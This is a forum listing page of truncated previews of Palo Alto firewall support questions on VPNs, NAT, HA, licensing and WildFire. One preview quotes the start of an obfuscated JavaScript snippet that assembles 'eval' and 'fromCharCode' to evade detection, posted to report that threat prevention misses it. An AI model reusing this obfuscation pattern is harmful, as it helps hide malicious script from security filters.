Resolved! Does the 25th Base Virtual Systems is free or requires a separately purchased license?
Does the 25th Base Virtual Systems in PAN 4050 are free or requires a separately purchased license?
Does the 25th Base Virtual Systems in PAN 4050 are free or requires a separately purchased license?
I am in the process of configuring a site to site vpn but when I try and select my public ipaddress (outside interface) for the local ip in the ike gateway setup the ip address is not avalible as an option. I assume this is because its already configured for my global protect gateway and portal? Is this possibly the issue? Currently the portal a...
Has anyone looked into a way to force users, when using Google or Bing for searches, to use only the safe search option?Thanks!
We are in the process of switching from a T1 provider to a fiber connection through another ISP. The T1 provider has us on a /29 network where they provide a router which occupies the first usable IP of the range. Our new ISP has the outside interface on our PA-500 connecting directly to a switch. We were given two ranges of IP addresses: a ...
Good Morning EveryoneCan anyone shed some light on why my PA-500 will auto-reboot after the following incident logged on the system log "description contains 'infra-group: restarts exhausted, rebooting system"We running the latest 4.1 OSHow can we prevent this from happening again?RegardsKobus
Hi,i just want to create a "easy" port forwarding rule from external (public ip), port 52516 to a internal server port 52516, but i can´t get it done on a PA-2050. it´s a web-service running on that internal server....i´ve created a service/application for that tcp-port, i´v created a PBF-Rule and a port-based NAT rule, but it´s not working at a...
So I have a few questions. We have netconnect working just fine for our mac users (PanOS 4.0.4) but we get an error about being unable to build nat interface on all windows 7 clients. If I enable the global protect feature, do I need to have it answer on a different IP address than the netconnect SSL vpn?ThanksPS. is there a better version of...
Hi folks,the Palo Alto Networks threat prevention is not able to recognize the following code as malicious:<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try /{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss=""; /if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)...
I'm new to Palo Alto firewalls. I'm setting up a PA-500 active/passive HA cluster, replacing an HA cluster of Sidewinder v7 (McAfee Firewall Enterprise) firewalls. I know from many years of experience with that type of firewall and from talking to tech support that using network objects of the FQDN type (requiring DNS lookups) is a bad thing f...
Hello. I'm trying to make - certain that I'm properly - grasping the concept of "Last Calendar Month", when I'm performing my historical searches. Say it's March 28th, 2012 and I'm conducting a search based upon the period value "Last Calendar Month"; am I correct to understand, that my results shall be reflective of everything that occurred f...
hello,I try to migrate a vpn between pix and palo-altowhen I try to generate traffic I can see the following error :IKE phase-1 negotiation is failed. When pre-shared key is used, peer-ID must be type IP address. Received type FQDNI understand that my pix need to have a fqdn configured on PALO ALTO in the field -> IKE-GATEWAYPeer identificati...
We use ntlm (CP) to authenticate our users against the PA.We want any http traffic forwarded to a proxy. The proxy would have http access to the internet through the PA. I was thinking of using a policy based forwarding rule to forward service-http to the proxy. Similar to how e.g. a Cisco router can intercept http traffic and forward it to a pr...
Hi!I am trying to setup a zone with Skype only configuration with the following "Application Group":skypeskype-probeweb-browsingThe end result is that Skype voice works fine; however, Add Contacts feature in Skype doesn't work.I am testing with the 5.8.0.158 version of Skype under Windows 7.Thx!- john
I have seen another thread on this issue in the KnowledgePoint database; however, there was no resolution or answer to the question. I have setup the Wildfire configuration on all of my PA500's per the documentation provided. When matching the file blocking rule I can see it in the Monitor interface for the file with a "forward" action, but it...
Just logged a support ticket recently regarding the direct group enumeration in PA 4.1.3 on a PA-5K .It seemed that the firewall was only returning the first 1000 AD objects.. which is a default limit defined by the "MaxPageSize" variable in Active Directory.LDAP clients making queries that exceed 1000 results will usually utilise the paging con...
| Subject | Likes |
|---|---|
| 5 Likes | |
| 2 Likes | |
| 2 Likes | |
| 2 Likes | |
| 2 Likes |
| User | Likes Count |
|---|---|
| 7 | |
| 6 | |
| 6 | |
| 4 | |
| 3 |

